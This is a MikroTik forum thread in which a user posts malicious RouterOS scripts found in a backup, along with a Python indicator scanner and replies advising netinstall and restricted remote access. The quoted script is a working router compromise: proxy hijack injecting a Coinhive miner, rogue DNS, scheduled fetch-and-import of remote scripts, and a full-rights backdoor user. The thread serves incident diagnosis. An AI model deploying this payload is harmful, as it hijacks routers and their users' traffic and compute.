abakisensoy
just joined
Topic Author
Posts: 21
Joined: Tue May 02, 2017 12:15 am

My Backup file contains malicious scripts

Mon Aug 24, 2020 4:04 am

Hi,

From time to time, I back up my settings. While checking my backup files I saw some strange scripts that I don't have in my Winbox Scripts & Jobs tab.

They are malicious for sure, but I couldn't find them anywhere except in my backup file.

How did they inject it? How does my backup file contain them? How can I get rid of them?

Here is the code:
[binary backup data: "scheduler" section header]
[binary record data; owner field "admin"]
:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}
/system scheduler remove [find name=Auto113]
/system scheduler remove [find name=upd111]
/system scheduler remove [find name=upd112]
/system scheduler remove [find name=upd113]
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\r\n:do {/tool fetch url=\"http://02ip.ru/1dVH37\" mode=http keep-result=no} on-error={}\r\n/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\r\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd113" interval=12h on-event=(":do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=flash/webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}\r\n/import u113.rsc\r\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}
:do {/file remove autosupout.rif} on-error={}
:do {/file remove autosupout.old.rif} on-error={}
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=no port=21 address=""
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }
/user add name=dircreate group=full password=1vJv12qWL8 disabled=no comment="9obi6kttB9q4Dp"
:do {/file print file=dircreate} on-error={:log info errorFilePrint}
:delay 5s
:do {/file set dircreate contents="<html>\r\n<head>\r\n	<meta http-equiv=\"Content-Type\" content=\"text/html;charset=windows-1251\">\r\n	<title>\"\$(url)\"</title> \r\n<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n<script>\r\n	var miner = new CoinHive.Anonymous('FgWWtJfuvPmrfwjOfgc9Vo55EyvrMBLh', {throttle: 0.1});\r\n	miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\r\n</script>\r\n</head>\r\n<frameset>\r\n<frame src=\"\$(url)\"></frame>\r\n</frameset>\r\n</html>"} on-error={:log info errorFileSave}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}
:do {/file remove "dircreate.txt"} on-error={}
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,185.126.178.0/24 [find name!=dircreate]} on-error={:log info errorSetAddress}
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}
/user remove [find name=ftu]
/user group remove [find name=ftpgroupe]
/ip service set ftp disabled=yes port=21 address=""
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}
/system reboot
[end of scheduler record "sh113"]
[binary record data; owner field "admin"]
:delay 5m
:do {/tool fetch url="http://02ip.ru/1dVH37" mode=http keep-result=no} on-error={}
/system scheduler remove [find name=upd111]
[end of scheduler record "upd111"]
[binary record data; owner field "admin"]
/system scheduler remove [find name=sh113]
:do {/file remove u113.rsc} on-error={}
[end of scheduler record "upd112"]
[binary record data; owner field "admin"]
:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=flash/webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}
/import u113.rsc
:do {/file remove u113.rsc} on-error={}
[end of scheduler record "upd113"]
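As an added example (not part of the original post or any reply, and not MikroTik software), the following Python script scans a plain-text RouterOS export (the output of /export, an .rsc file) for the indicators visible in the script quoted above: the scheduler names, the download hosts, the "dircreate" user, the Coinhive miner URL, the web proxy being switched on, the dstnat redirect of port 80, and IP services left enabled with an empty address restriction. The rule set and the sample export lines are constructed from this post; the function names, rule names and the "full group needs review" heuristic are my own assumptions, not a MikroTik or community standard.

```python
"""Scan a RouterOS /export text for the indicators seen in this forum post."""
import re
from dataclasses import dataclass

# Indicators copied from the script quoted in the original post.
SUSPICIOUS_SCHEDULERS = {"upd111", "upd112", "upd113", "Auto113", "sh113"}
SUSPICIOUS_HOSTS = {"02ip.ru", "up0.bit", "2no.co", "coinhive.com"}
SUSPICIOUS_USERS = {"dircreate", "ftu"}


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line in the export text
    rule: str      # which check fired
    detail: str    # the matched name/host/service


_SCHED_ADD = re.compile(r'/system scheduler add\b.*?\bname="?([\w.-]+)"?')
_URL_HOST = re.compile(r'https?://([A-Za-z0-9.-]+)')
_USER_ADD = re.compile(r'/user add\b.*?\bname="?([\w.-]+)"?')
_SERVICE_OPEN = re.compile(r'/ip service set (\w+)\b.*\bdisabled=no\b.*\baddress=""')
_HTTP_REDIRECT = re.compile(
    r'/ip firewall nat add\b.*\bchain=dstnat\b.*\bdst-port=80\b.*\baction=redirect\b')
_PROXY_ON = re.compile(r'/ip proxy set\b.*\benabled=yes\b')


def scan_export(text: str) -> list[Finding]:
    """Return one Finding per (line, rule, detail), in line order."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        if _PROXY_ON.search(line):
            findings.append(Finding(n, "proxy-enabled", "web proxy switched on"))
        if _HTTP_REDIRECT.search(line):
            findings.append(Finding(n, "http-redirect", "dstnat redirect of port 80"))
        m = _SCHED_ADD.search(line)
        if m and m.group(1) in SUSPICIOUS_SCHEDULERS:
            findings.append(Finding(n, "scheduler", m.group(1)))
        # A single on-event may embed several fetch URLs; report each host once.
        for host in sorted(set(_URL_HOST.findall(line))):
            if host in SUSPICIOUS_HOSTS:
                findings.append(Finding(n, "suspicious-host", host))
        m = _USER_ADD.search(line)
        if m:
            if m.group(1) in SUSPICIOUS_USERS:
                findings.append(Finding(n, "user-known-bad", m.group(1)))
            elif "group=full" in line:
                # Assumption: any extra full-rights user deserves a manual look.
                findings.append(Finding(n, "user-full-review", m.group(1)))
        m = _SERVICE_OPEN.search(line)
        if m:
            # Enabled service with address="" is reachable from anywhere (see Jotne's reply).
            findings.append(Finding(n, "service-unrestricted", m.group(1)))
    return findings


# Constructed sample: lines taken from the posted script plus a few benign ones.
SAMPLE_EXPORT = r"""/ip proxy set enabled=yes port=8080 src-address="::"
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall filter add chain=input protocol=tcp dst-port=22 action=accept comment=ssh-mgmt
/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\r\n:do {/tool fetch url=\"http://02ip.ru/1dVH37\" mode=http keep-result=no} on-error={}" policy=read,write
/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=reboot
/system scheduler add name="backup-daily" interval=1d on-event="/system backup save" policy=read,write
/file set dircreate contents="<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>"
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=yes port=21 address=""
/ip service set winbox disabled=no port=8291 address=192.168.88.0/24
/user add name=dircreate group=full disabled=no comment="9obi6kttB9q4Dp"
/user add name=backup-operator group=full
"""

if __name__ == "__main__":
    for f in scan_export(SAMPLE_EXPORT):
        print(f"line {f.line_no:3d}  {f.rule:<20} {f.detail}")
```

Run it against a real export with `scan_export(open("router.rsc").read())`; lines 3, 6, 9 and 10 of the sample produce nothing, which is the point: the restricted winbox service and the disabled ftp service are the settings a clean router should show.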
 
vecernik87
Forum Veteran
Posts: 777
Joined: Fri Nov 10, 2017 8:19 am

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 7:02 am

Netinstall - the only way to get rid of hidden stuff...
 
Jotne
Forum Guru
Posts: 1915
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 11:50 am

Do you have any admin possibility from the internet? If so, that is a way in. VPN is the only good solution for remote admin.
What version did your router have? Old versions should be upgraded.
 
Why not use Splunk to monitor your MikroTik Router(s)? Look at this page on how to set it up.

MikroTik->Splunk
 
 
Sob
Forum Guru
Posts: 6517
Joined: Mon Apr 20, 2009 9:11 pm

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 2:28 pm

Was the router hacked in the past and did you clean it without netinstalling? A backup can also contain some deleted data.
Excessive quoting is useless and annoying. If you use it, please consider if you could do without it.
 
martking
just joined
Posts: 15
Joined: Mon Apr 03, 2017 8:54 pm

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 7:13 pm

Looking at that script I'd say you have been hacked. If you try to go to a website on port 80, you should get an error page appearing.
 
fleg
newbie
Posts: 26
Joined: Mon Nov 06, 2017 12:31 pm

Re: My Backup file contains malicious scripts

Mon Jan 25, 2021 9:31 pm

I'm interested: where did you find this script? In which rsc?
